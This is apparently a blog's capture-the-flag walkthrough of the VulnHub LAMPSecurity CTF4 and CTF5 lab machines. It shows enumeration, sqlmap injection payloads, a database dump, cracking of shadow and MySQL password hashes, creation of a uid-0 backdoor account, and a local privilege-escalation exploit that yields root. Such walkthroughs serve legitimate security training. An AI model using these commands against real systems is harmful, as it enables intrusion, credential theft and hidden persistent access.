sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrentSeed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAPServer:/var/lib/imap:/bin/bash


bash-3.2# cat shadow
root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd/homebash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issueFedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-release
Fedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr08:00:27:C3:02:2B
inetaddr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inetaddr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACKRUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomainlocalhostlocalhost
::1 localhost6.localdomain6 localhost6


Lets crack the password now: 

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer- johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root using John seems tedious, lets use hashcatfor this purpose and try..

root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcatwill expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcatv0.49 with 1 threads and 32mbsegment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015


So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost~]# whoami
root
[root@localhost~]# 



Creating a backdooruser with root privileges :bash-3.2# useradd-ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd|grepjohn
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passed johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :

root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost~]#


Saturday, October 31, 2015

Tango Down (CTF4) : Capture The Flag (CTF) 4 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf4,83/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

- Search the IP, start the VM, select the network to Host Only network, now we are aware the subnet used by host only, just run an nmapscan to identify the network IP.

We got the below IP and services :

Nmapscan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcpclosed ipp
MAC Address: 08:00:27:37:40:F6 (CadmusComputer Systems)


To confirm, Telnet on 25 port
root@kali:~# telnet 192.168.56.101 25

Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ctf4.sas.upenn.eduESMTPSendmail8.13.5/8.13.5; Sat, 24 Oct 2015 00:05:52 -0400
HELO
501 5.0.0 HELOrequires domain address
VRYroot
500 5.5.1 Command unrecognized: "VRYroot"
help
214-2.0.0 This is sendmailversion 8.13.5
214-2.0.0 Topics:
214-2.0.0 HELO EHLO MAIL RCPT DATA
214-2.0.0 RSET NOOP QUIT HELP VRFY
214-2.0.0 EXPN VERB ETRN DSN AUTH
214-2.0.0 STARTTLS
214-2.0.0 For more info use "HELP ".
214-2.0.0 To report bugs in the implementation send email to
214-2.0.0 sendmail-bugs@sendmail.org.
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
VRFYroot
250 2.1.5 <root@ctf4.sas.upenn.edu>

This is the host.

Now we will do further scanning and enumeration :

Port 80 :

A normal site seems to be hosted here, a static. Running niktoon this..




Vulnerability Assessment and Exploit :

Testing SQLInjection :
root@kali:~/vulhub/ct4# sqlmap-u http://192.168.56.101 --crawl=3
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150429}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmapfor attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:17:44

do you want to check for the existence of site's sitemap(.xml) [Y/n]
[01:17:46] [INFO] no links found
[01:17:46] [INFO] starting crawler
[01:17:46] [INFO] searching for links with depth 1
[01:17:46] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)]
[01:17:48] [WARNING] running in a single-thread mode. This could take a while
[01:17:48] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 3
[01:17:58] [INFO] starting 3 threads
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[01:18:00] [INFO] sqlmapgot a total of 8 targets
URL 1:
GET http://192.168.56.101:80/index.html?title=Home Page
do you want to test this URL? [Y/n/q]
>
[01:18:02] [INFO] testing URL 'http://192.168.56.101:80/index.html?title=Home Page'
[01:18:02] [INFO] using '/root/.sqlmap/output/results-10242015_0118am.csv' as the CSVresults file in multiple targets mode
[01:18:02] [INFO] testing connection to the target URL
[01:18:02] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:03] [INFO] target URL is stable
[01:18:03] [INFO] testing if GET parameter 'title' is dynamic
[01:18:03] [WARNING] GET parameter 'title' does not appear dynamic
[01:18:03] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[01:18:03] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to XSSattacks
[01:18:03] [INFO] testing for SQLinjection on GET parameter 'title'
[01:18:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:03] [WARNING] reflective value(s) found and filtering out
[01:18:03] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'PostgreSQLAND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'Microsoft SQLServer/SybaseAND error-based - WHERE or HAVING clause'
[01:18:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:04] [INFO] testing 'MySQLinlinequeries'
[01:18:04] [INFO] testing 'PostgreSQLinlinequeries'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybaseinlinequeries'
[01:18:04] [INFO] testing 'Oracle inlinequeries'
[01:18:04] [INFO] testing 'SQLiteinlinequeries'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:04] [INFO] testing 'PostgreSQL> 8.1 stacked queries'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybasestacked queries'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 AND time-based blind'
[01:18:04] [INFO] testing 'PostgreSQL> 8.1 AND time-based blind'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybasetime-based blind'
[01:18:04] [INFO] testing 'Oracle AND time-based blind'
[01:18:04] [INFO] testing 'MySQLUNION query (NULL) - 1 to 10 columns'
[01:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:05] [WARNING] using unescapedversion of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:06] [WARNING] GET parameter 'title' is not injectable
[01:18:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 2:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog
do you want to test this URL? [Y/n/q]
>
[01:18:12] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog'
[01:18:12] [INFO] testing connection to the target URL
[01:18:12] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:13] [INFO] target URL is stable
[01:18:13] [INFO] testing if GET parameter 'page' is dynamic
[01:18:13] [INFO] confirming that GET parameter 'page' is dynamic
[01:18:13] [INFO] GET parameter 'page' is dynamic
[01:18:13] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[01:18:13] [INFO] testing for SQLinjection on GET parameter 'page'
[01:18:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'PostgreSQLAND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Microsoft SQLServer/SybaseAND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:13] [INFO] testing 'MySQLinlinequeries'
[01:18:13] [INFO] testing 'PostgreSQLinlinequeries'
[01:18:13] [INFO] testing 'Microsoft SQLServer/Sybaseinlinequeries'
[01:18:13] [INFO] testing 'Oracle inlinequeries'
[01:18:13] [INFO] testing 'SQLiteinlinequeries'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:13] [INFO] testing 'PostgreSQL> 8.1 stacked queries'
[01:18:13] [INFO] testing 'Microsoft SQLServer/Sybasestacked queries'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 AND time-based blind'
[01:18:13] [INFO] testing 'PostgreSQL> 8.1 AND time-based blind'
[01:18:14] [INFO] testing 'Microsoft SQLServer/Sybasetime-based blind'
[01:18:14] [INFO] testing 'Oracle AND time-based blind'
[01:18:14] [INFO] testing 'MySQLUNION query (NULL) - 1 to 10 columns'
[01:18:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:14] [WARNING] using unescapedversion of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:15] [WARNING] GET parameter 'page' is not injectable
[01:18:15] [INFO] skipping previously processed GET parameter 'title'
[01:18:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=research&title=Research'
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=contact&title=Contact'
URL 3:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2
do you want to test this URL? [Y/n/q]
>
[01:18:19] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2'
[01:18:19] [INFO] testing connection to the target URL
[01:18:19] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:19] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:20] [INFO] target URL is stable
[01:18:20] [INFO] skipping previously processed GET parameter 'page'
[01:18:20] [INFO] skipping previously processed GET parameter 'title'
[01:18:20] [INFO] testing if GET parameter 'id' is dynamic
[01:18:20] [INFO] confirming that GET parameter 'id' is dynamic
[01:18:20] [INFO] GET parameter 'id' is dynamic
[01:18:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:18:20] [INFO] testing for SQLinjection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[01:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:39] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:18:39] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 AND error-based - WHERE or HAVING clause (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQL>= 4.1 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.0 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 OR error-based - WHERE or HAVING clause (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQL>= 4.1 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQLOR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - PROCEDURE ANALYSE(EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.0 error-based - Parameter replace'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 error-based - Parameter replace (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQLinlinequeries'
[01:18:39] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:39] [WARNING] time-based comparison requires larger statistical model, please wait..
[01:18:39] [INFO] testing 'MySQL< 5.0.12 stacked queries (heavy query)'
[01:18:39] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:49] [INFO] GET parameter 'id' seems to be 'MySQL> 5.0.11 AND time-based blind (SELECT)' injectable
[01:18:49] [INFO] testing 'MySQLUNION query (NULL) - 1 to 20 columns'
[01:18:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:18:49] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:18:49] [INFO] target URL appears to have 5 columns in query
[01:18:49] [INFO] GET parameter 'id' is 'MySQLUNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmapidentified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 6954=6954

Type: UNION query
Title: MySQLUNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,CONCAT(0x716b707171,0x69637369434f4f546370,0x71707a7671),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))VbJV)
---
do you want to exploit this SQLinjection? [Y/n]
[01:19:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP5.1.2
back-end DBMS: MySQL5.0.11
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=5'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=6'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=7'
[01:19:18] [INFO] you can find results of scanning in multiple targets mode inside the CSVfile '/root/.sqlmap/output/results-10242015_0118am.csv'

[*] shutting down at 01:19:18


Took a database dump for the user accounts and hashes :
sqlmap-u http://192.168.56.101 --crawl=5 --dbms=mysql--dump --threads=5


+++ Truncated O/p+++
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:31:14] [INFO] writing hashes to a temporary file '/tmp/sqlmap_bywwj4272/sqlmaphashes-lLP7FS.txt'
do you want to crack them via a dictionary-based attack? [y/N/q]
Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+----------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6 | ghighland| 9f3eb3087298ff21843cc4e013cf355f |+---------+-----------+----------------------------------+


++++++++++++++++

Cracking the hashes for the accounts :

1.iliketosurf






2. achen: seventysixers
3.pmoore: Homesite
4.jdurbin: Sue1978
5.sorzek: pacman6.ghighland: undone1

So we have all the SQLUsernamesand password now !


From Nikto we found some more paths :
==============================================
root@kali:~/vulhub/ct4# nikto-h http://192.168.56.101
- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-24 01:16:56 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.0 (Fedora)
+ Retrieved x-powered-by header: PHP/5.1.2
+ The anti-clickjackingX-Frame-Options header is not present.
+ Server leaks inodesvia ETags, header found with file /robots.txt, inode: 487720, size: 104, mtime: Tue Dec 9 23:39:44 2014
+ File/dir'/mail/' in robots.txtreturned a non-forbidden or redirect HTTP code (302)
+ File/dir'/conf/' in robots.txtreturned a non-forbidden or redirect HTTP code (500)
+ OSVDB-3268: /sql/: Directory indexing found.
+ File/dir'/sql/' in robots.txtreturned a non-forbidden or redirect HTTP code (200)
+ File/dir'/admin/' in robots.txtreturned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.0 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuctionmay allow user adminaccounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-682: /usage/: Webalizermay be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /pages/: Directory indexing found.
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Adminlogin page/section found.+ 7500 requests: 1 error(s) and 30 item(s) reported on remote host

+ End Time: 2015-10-24 01:17:32 (GMT1) (36 seconds)
---------------------------------------------------------------------------


Trying login using the user / password we gathered from previous sqlmapstep :







Login successfull, but do not see any adminconsole, lets try other logins..


To Gain Shell :

First step, lets try to find a shell to the host. We defaced multiple user / password above, lets try to use some ids..

I randomly picked "achen" , and it works !!, I have shell now.

root@kali:~/vulhub/ct4# ssh achen@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSAkey fingerprint is e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@192.168.56.101's password:
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ id
uid=501(achen) gid=501(achen) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t
[achen@ctf4 ~]$ uname-a
Linux ctf4.sas.upenn.edu2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[achen@ctf4 ~]$ cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

[achen@ctf4 ~]$

Privilege Escalation :
After a lot of research, I got this : http://www.securityfocus.com/bid/18874/exploit. Downloaded and copied the exploit onto the victim host.




On the victim node, gave exec permissions and then ran the exploit script :


[achen@ctf4 ~]$ chmod+x zmia-jul14-2006.sh

[achen@ctf4 ~]$ ./zmia-jul14-2006.sh
wait aprox4 min to get sh

sh-3.1# id
uid=0(root) gid=0(root) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t


We are ROOT

Observation:

OS:
sh-3.1# cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

You have new mail in /var/spool/mail/achen

sh-3.1# uname-a
Linux ctf4.sas.upenn.edu2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux


Passwords :
sh-3.1# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
